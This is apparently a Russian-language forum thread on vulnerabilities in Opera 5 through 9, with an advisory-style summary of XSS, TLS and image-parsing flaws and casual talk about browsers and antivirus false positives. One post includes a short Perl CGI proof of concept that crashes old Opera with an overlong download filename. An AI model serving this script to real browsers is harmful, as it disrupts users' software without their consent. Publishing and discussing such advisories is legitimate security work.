Множественные уязвимости в Opera

Opera 5.x
Opera 6.x
Opera 7.x
Opera 8.x
Opera 9.x

Найденные уязвимости позволяют удаленному злоумышленнику осуществить XSS атаку, получить доступ к конфиденциальной информации и выполнить произвольный код на целевой системе.

1) Уязвимость возникает из-за ошибки в проверке входных данных. Атакующий может совершить XSS нападение на целевую систему.

2) Уязвимость возникает из-за ошибки в проверке входных данных при обработке TLS сертификатов. Атакующий может передать специально сформированные данные, что приведет к выполнению произвольного кода.

3) Уязвимость возникает из-за ошибки в редактировании текста Rich при использовании режима designMode. Атакующий может совершить XSS нападение на целевую систему.

4) Уязвимость возникает из-за ошибки в проверке входных данных при обработке растровых графических изображений. Атакующий может получить доступ к содержимому произвольных участков памяти.

------
Nascentes morimur.

А где их нет? Этих уязвимостей?
Я вот по совету некоторых участников с этого форума использую OPERA, + работаю под учетной записью пользователя. И ещё ни одна дрянь с просторов сети ко мне не прицепилась.
Под учетной записью админа, да с включенным антивирем всё было гораздо хуже.. .

А где их нет? Этих уязвимостей?

Хороший вопрос...

http://ssh.com/

Я например как только перешел на Оперу избавился от вирусов которые лезли через браузер. с IE запарился просто. И панельки ещё сами ставились какие то. А тут всё просто и надёжно.
А кто нашел уязвимости?

А кто нашел уязвимости?

Крис Касперский

Сижу в Мозилле, пароль рута не скажу никому, ssh отключен принципиально.. . Какие-такие вирусы?
Зы. С яндекс-баром, яндекс-блэкджэком и яндекс-шлюхами

ssh отключен принципиально...

Не подскажите, как возможно отключить SSH порт?

Убрать запуск службы из /etc/rc2.d/ ?

Ну касперский еще не то может найти (к примеру недавняя хохма про определение IE как вирус и удаление его (после обновление KAV 7)). Сам сижу под фоксом... . зверья нет

Originally posted by CAV:

определение IE как вирус

дык может и правда вирус подменил или модифицировал ie.exe

еще каспер explorer.exe определил как вирь, со всеми вытекающими

Вот еще по теме:

Отказ в обслуживании обнаружен в Opera. Удаленный сервер может аварийно завершить работу браузера во время загрузки файла.

Переполнение буфера существует в обработке имени файла в процессе загрузки файла. Длинное имя файла приведет к аварийному завершению работы браузера.

Пример:

#!/usr/bin/perl
# Smash Heap Memory.
# This script is CGI program.
$ =1;
my $filename = "." . "\xCC" x (int(rand(0x20000)) + 0x100);
print "Content-type: text/html\r\n";
print qq~Content-Disposition: filename="$filename"\r\n~;
print "\r\n";
print "<html><body>Love & Peace </body></html>\r\n";

Уязвимость обнаружена в Opera Web Browser 7.10 build 2840 и более ранних версиях.

Originally posted by Trogloditus:

и более ранних версиях

сейчас 9.25 версия билд 8827 уже доступна, таким старьем как 7-я врятли кто-то пользуется

пока в 9.хх не починят RSS я ей пользовацца не буду.
Привык Башорг читать как ленту

Originally posted by ober:
еще каспер explorer.exe определил как вирь, со всеми вытекающими

Ничего особенного - я в период увлечением Делфой замечал, что любые мои программульки, даже если там обращений к файловой системе не было, частенько эверистикой обзывались злобными вирусами и удалялись. Наверное, просто тупо из-за обращений к динамоческой памяти в коде.
Да что там, когда то надо было на пустом компе с диал-апом математическую прогу малюсенькую накидать (оптимизация на 3 параметра), залил обычный Бесик (не Визуал) с компиллятором, закомпилил в exeшник - тоже как вирус определил.
До сих пор не понимаю, по какому принципу.

опера форева

Каспер шибко резвый. А вот Аваст у меня нашел пару троянов, коих Каспер не видел.. .